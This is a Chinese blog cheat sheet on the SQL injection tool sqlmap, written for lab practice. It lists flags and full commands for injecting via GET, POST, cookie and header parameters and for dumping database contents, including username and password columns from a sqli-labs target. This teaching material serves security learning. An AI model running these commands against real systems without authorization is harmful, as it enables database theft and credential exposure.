SQLmap常用命令/使用教程

已于 2024-06-23 18:01:47 修改
阅读量1.2w 收藏 18
点赞数 4
分类专栏: 网络安全面试题汇总 文章标签: 网络安全 web安全 安全
于 2021-08-08 17:33:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/119514174
版权

 「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

SQLmap是一款自动化SQL注入神器,用于SQL注入漏洞的检测和利用,支持多种数据库

检测位置

-u			-- 指定url(GET请求)
-p			-- 指定参数(url包含多个参数时,指定参数)
--data=		-- 指定POST请求参数
--cookie	-- 指定cookie参数
-r			-- 从文件中加载HTTP请求(在需要检测的Header后面加上*)

获取数据

--dbs		-- 获取数据库名
--tables	-- 获取表名
--columns	-- 获取字段名
--dump		-- 获取数据
-D	-- 指定数据库
-T	-- 指定表
-C	-- 指定字段

其他设置

--batch		-- 自动化确认
--tamper	-- 指定脚本
--dbms		-- 指定数据库类型
--os		-- 指定操作系统(windows/linux)
--level		-- 指定探测等级(1~5)
--current-db	-- 获取当前数据库的名字
-b	-- 获取数据库版本信息
-f	-- 获取数据库指纹
--users	-- 当前使用的用户
--delay	-- 设置延时
--technique	-- 指定注入方式
	U	联合注入
	E	报错注入
	B	布尔盲注
	T	时间盲注

针对不同的注入位置

GET请求注入

sqlmap -u http://192.168.40.129/sqli/Less-1/?id=1

POST请求注入

sqlmap -u http://192.168.40.129/sqli/Less-11/ --data="uname=lisi"

COOKIE注入

sqlmap -u xxx/index.php --cookie "uname=admin" --level 2 --dbs

HTTP请求头注入(User-agent/Referer/Cookie等HTTP Header),拦截get,post等HTTP请求,将所有请求内容复制到target.vm文件中,在需要检测的Header后面加上*,并且需要level>=3

sqlmap -r target.vm --level 3 --dbs

获取数据

获取所有数据库

sqlmap -u http://192.168.40.129/sqli/Less-1/?id=1 --batch --dbs

获取指定数据库中的所有表

sqlmap -u http://192.168.40.129/sqli/Less-1/?id=1 --batch -D security --tables

获取指定数据库中指定表的所有字段

sqlmap -u http:xxx/?id=1 --batch -D security -T users --columns

获取指定数据库中指定表中指定字段的所有数据

sqlmap -u xxx/?id=1 --batch -D security -T users -C username,password --dump

HTTP Header头注入

1.拦截post请求信息,并将请求信息的全部内容复制到文件中,

2.在需要检测的Header位置添加*

3.使用SQLmap对指定文件进行检测,SQLmap会自动检索*,从而对目标Header进行检测

士别三日wyx
关注
  • 4
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 4万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
Sqlmap命令大全
学习、分享、交流
05-26 2万+
Sqlmap:开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能 够查看数据,文件系统访问,甚至能够操作系统命令执行。
sqlmap 常用命令
tryheart的博客
09-01 1183
常用命令 -u 指定目标URL (可以是http协议也可以是https协议) -d 连接数据库 –dbs 列出所有的数据库 –current-db 列出当前数据库 –tables 列出当前的表 –columns 列出当前的列 -D 选择使用哪个数据库 -T 选择使用哪个表 -C 选择使用哪个列 –dump 获取字段中的数据 –batch 自动选择yes –smart 启发式快速判断,节约浪费时间 –forms 尝试使用post注入 -r 加载文件中的HTTP请求(本地保存的请求包txt文件) -l 加载文件
SQLmap学习以及题解运用
最新发布
Z11762的博客
05-21 988
SQLmap是一款开源的SQL注入工具,用于检测和利用Web应用程序的SQL注入漏洞。SQLmap支持多种数据库管理系统,包括MySQL、Oracle、PostgreSQL、Microsoft SQL Server、SQLite等,并支持各种不同的操作系统和平台。这里主要分为四大部分目标脱库账号与其它,sqlmap是一款自动化的sql注入工具,下面我用的是kali自带的sqlmap工具首先需要打开虚拟机终端,输入命令sqlmap,如果出现以下界面就说明工具可以使用。
Sqlmap工具】使用与应用技巧
2301_77162959的博客
03-22 725
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
Web安全工具—Sqlmap常用命令和参数(持续更新)
weixin_44431280的博客
04-07 1万+
Web安全工具—SQLMAP常用命令和参数 简介:此篇文章主要记录学习注入神器sqlmap的过程,文章会对常见参数进行详解(附图),适合入门学习。 一:SQLMAP介绍: 简介:sqlmap是一个由python语言编写的开源自动化渗透测试工具,主要被用来检测sql注入漏洞,是一款功能强大的sql漏洞检测利用工具。 支持检测的数据库:access,mysql,oracle,postgresql,sqlserver(mssql),db2等 支持的注入类型:布尔盲注,时间盲注,显错注入,堆叠注入,联合查询注入等,
sqlmap -u -r参数的使用
qq_52072846的博客
03-15 1万+
SQLMAP基本使用实例 -u参数的用法: 1.爆当前数据库的库名 sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" 爆指定数据库中的表名 sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security --tables
SQLmap常用命令
05-08
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,当然对于真实环境中这爆破功能战斗力基本为0....
sqlmap安装包及教程.zip
12-23
在这个"sqlmap安装包及教程.zip"压缩文件中,包含了SQLMap的安装程序和后续配置的教程,这将有助于用户快速上手和熟练使用这款工具。 首先,让我们深入了解SQLMap的基本概念。SQL注入是一种常见的网络安全威胁,...
sqlmap命令大全
02-22
什么是SQLmapSQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)
SQLMAP使用笔记.pdf
01-25
下面是 SQLMAP 的使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> [options]` 其中,`-u` 选项指定了要测试的 URL,`[options]` 是可选的参数和选项。 二、...
Sqlmap使用手册中文版
01-13
学习使用Sqlmap,除了阅读其官方文档和用户手册,还可以配合像sqli-labs这样的实验系统进行实践。用户手册详尽地介绍了Sqlmap的所有选项和开关,提供了丰富的实例,帮助用户理解和掌握如何有效使用这个工具。 当...
Python之SQLMap自动SQL注入和渗透测试工具示例详解
naer_chongya的博客
07-20 1827
网络安全领域中,渗透测试是一项重要的任务。其中,SQL注入攻击是最常见的一种攻击方式之一。为了简化渗透测试过程中的繁琐操作,开发者们设计了各种自动化工具。其中,SQLMap是一款使用Python编写的强大工具,用于进行自动化的SQL注入和渗透测试。本文将详细介绍SQLMap的使用方法,包括Python语言环境的搭建、SQLMap的安装和配置、基本使用方法以及具体示例,以帮助读者更好地理解和运用这一强大的工具。
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
sqlmap的基本命令使用
热门推荐
Leonardo DiCaprio‘s spring
03-24 5万+
本人小白,初次认识sqlmap,很多都是转载资料,只是学习研究一下! 练习的网站可以用谷歌搜一下; cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables                 sqlmap.py -u 登
SQLmap参数详解
Williamanddog的博客
01-19 5511
目标URL参数:-u或者--url 格式:http(s)://targeturl[:port]/[…] 例如:python sqlmap.py -u "从Burp或者WebScarab代理中获取日志 参数:-l 可以直接吧Burp proxy或者WebScarab proxy中的日志直接导出来交给sqlmap来一个一个检测是否有 注入。 从文本中获取多个目标扫描 参数:-m 文件中保存url,sqlmap会一个一个检测 从文件中加载HTTP请求 参数:-r。
sqlmap命令详解
Pitbull2014的博客
12-20 1121
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
Sqlmap参数详解
gao646467783的博客
11-21 801
sqlmap全参数详解 sqlmap是在sql注入中非常常用的一款工具,由于其开源性,适合从个人到企业,从学习到实战,各领域各阶段的应用,我们还可以将它改造成我们自己独有的渗透利器。这款工具中,大大小小191个参数,在这篇文章中,我将一一介绍,其实很多参数我也没有使用过,所以有一些...
sqlmap使用详解
weixin_59246157的博客
04-21 1656
id=1" -D security -T users -C username --dump --start 1 --stop 100 #爆出数据库security中的users表中的username列中的前100条数据。
sqlmap常用命令
12-07
以下是sqlmap的几个常用命令: 1. 基本扫描命令:`python sqlmap.py -u <目标URL> --dbs`,用于扫描目标URL的数据库。 2. 指定cookie进行扫描:`python sqlmap.py -u <目标URL> --cookie="<cookie内容>" --dbs`,用于使用指定的cookie进行扫描。 3. 使用配置文件进行扫描:`python sqlmap.py -c sqlmap.conf`,用于使用配置文件进行扫描。 4. 指定注入点进行扫描:`python sqlmap.py -u <目标URL> --data="<POST数据>" --dbs`,用于指定POST数据中的注入点进行扫描。 5. 获取数据库信息:`python sqlmap.py -u <目标URL> -D <数据库名> --tables`,用于获取指定数据库的所有表名。 6. 获取表信息:`python sqlmap.py -u <目标URL> -D <数据库名> -T <表名> --columns`,用于获取指定表的所有列名。 7. 获取列信息:`python sqlmap.py -u <目标URL> -D <数据库名> -T <表名> -C <列名> --dump`,用于获取指定列的所有数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值